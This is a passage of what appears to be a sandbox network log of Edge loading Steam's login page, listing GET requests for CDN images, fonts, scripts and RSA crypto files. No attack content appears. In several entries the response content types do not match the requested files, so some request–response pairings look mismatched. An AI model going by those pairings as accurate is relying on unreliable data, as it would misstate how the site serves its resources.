x-cache: MISS
cf-cache-status: HIT
age: 5591
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63c3b32668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/header_menu_hamburger.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 2584
last-modified: Wed, 28 Jun 2023 04:07:18 GMT
etag: "649bb1f6-a18"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 3286
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac22668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/header_logo.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 10863
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-2a6f"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2870
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac17668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/header/logo_steam.svg?t=962016 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 204760
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:55:12 GMT
etag: "qfjr3RfNj6k8"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 460384
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac1e668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/css/applications/store/main.css?v=4yXuci3ZBfrM&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/store/main.css?v=4yXuci3ZBfrM&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 8123
cache-control: public,max-age=15552000
expires: Tue, 23 Apr 2024 22:38:49 GMT
etag: "pqS062l3FhPW"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 288569
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac1b668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/manifest.js?v=pqS062l3FhPW&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/manifest.js?v=pqS062l3FhPW&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 3777
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-ec1"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 6929
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac15668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/libraries~b28b7af69.js?v=pBr7zp-CCw5_&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/libraries~b28b7af69.js?v=pBr7zp-CCw5_&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/gif
content-length: 1171
last-modified: Wed, 28 Jun 2023 04:07:19 GMT
etag: "649bb1f7-493"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4802
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac25668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main.js?v=qfjr3RfNj6k8&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/main.js?v=qfjr3RfNj6k8&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/css;charset=UTF-8
content-length: 31439
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:55:12 GMT
etag: "4yXuci3ZBfrM"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 460384
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac1a668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/images/v6/logo_steam_footer.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/images/v6/logo_steam_footer.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 2843
last-modified: Wed, 28 Jun 2023 04:07:22 GMT
etag: "649bb1fa-b1b"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 2579
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac1f668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/images/footerLogo_valve_new.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/images/footerLogo_valve_new.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 249338
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:55:12 GMT
etag: "pBr7zp-CCw5_"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 460384
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac1c668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/images/ico/ico_facebook.gif

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/images/ico/ico_facebook.gif HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/svg+xml
last-modified: Wed, 28 Jun 2023 04:07:11 GMT
etag: W/"649bb1ef-e64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4127
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dac19668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/images/ico/ico_twitter.gif

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/images/ico/ico_twitter.gif HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/gif
content-length: 1419
last-modified: Wed, 28 Jun 2023 04:07:19 GMT
etag: "649bb1f7-58b"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 2886
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63e8cbd668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Regular.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 122684
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1df3c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 972
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6904d61668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Light.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 122660
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1df24"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 6318
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6923f55668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Thin.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 118736
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1cfd0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5961
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b694189d668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Medium.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 124048
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1e490"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5666
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b694b919668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Bold.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:33 GMT
content-type: application/octet-stream
content-length: 123884
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1e3ec"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4786
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6973af9668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:33 GMT
content-type: application/octet-stream
content-length: 135500
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-2114c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 2213
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6984bbb668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:33 GMT
content-type: application/octet-stream
content-length: 133600
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-209e0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5362
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b698cc11668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:33 GMT
content-type: application/octet-stream
content-length: 134500
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-20d64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 1642
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6991c44668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Black.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Black.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:37 GMT
content-type: application/octet-stream
content-length: 120816
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1d7f0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 1973
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6b39ebb668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/crypto/jsbn.js

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/crypto/jsbn.js HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: text/javascript;charset=UTF-8
content-length: 11528
cache-control: public,max-age=1190,must-revalidate
expires: Mon, 30 Oct 2023 07:05:05 GMT
etag: "P5-v3JwM3dJd"
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: EXPIRED
cf-cache-status: HIT
age: 114
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d52f83668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/crypto/rsa.js

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/crypto/rsa.js HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: text/javascript;charset=UTF-8
content-length: 996
cache-control: public,max-age=933,must-revalidate
expires: Mon, 30 Oct 2023 06:42:44 GMT
etag: ".2DapVp3yyevw"
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 921
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d61833668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/shared_english-json.js?contenthash=c4d9c3efdd37b8f4a528

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/shared_english-json.js?contenthash=c4d9c3efdd37b8f4a528 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 24 Oct 2023 22:53:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:55:13 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 460409
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d90a47668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/sales_english-json.js?contenthash=3986b644cc48d256c2f6

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/sales_english-json.js?contenthash=3986b644cc48d256c2f6 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:10 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:45 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1669856
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d93a62668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main_english-json.js?contenthash=cfd9e67c46d37639a2a9

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/main_english-json.js?contenthash=cfd9e67c46d37639a2a9 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 01 Aug 2023 22:36:05 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Jan 2024 22:37:45 GMT
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 7719057
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d97a95668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/marketing_english-json.js?contenthash=673368b36f7a8a046c17

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/marketing_english-json.js?contenthash=673368b36f7a8a046c17 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:45 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 01 Aug 2023 22:36:05 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Jan 2024 22:37:45 GMT
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 7719059
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6e62bcd668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/joinsteam/new_login_bg_strong_mask.jpg HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:46 GMT
content-type: image/jpeg
content-length: 124529
cf-bgj: h2pri
etag: "649bb1ef-1e671"
last-modified: Wed, 28 Jun 2023 04:07:11 GMT
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6e97e7f668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/login/code_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/login/code_box.png?v=1 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:49 GMT
content-type: image/png
content-length: 3297
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-ce1"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 5337
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6fcfcd7668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/login/friendlyname_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/login/friendlyname_box.png?v=1 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:50 GMT
content-type: image/png
content-length: 3196
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-c7c"
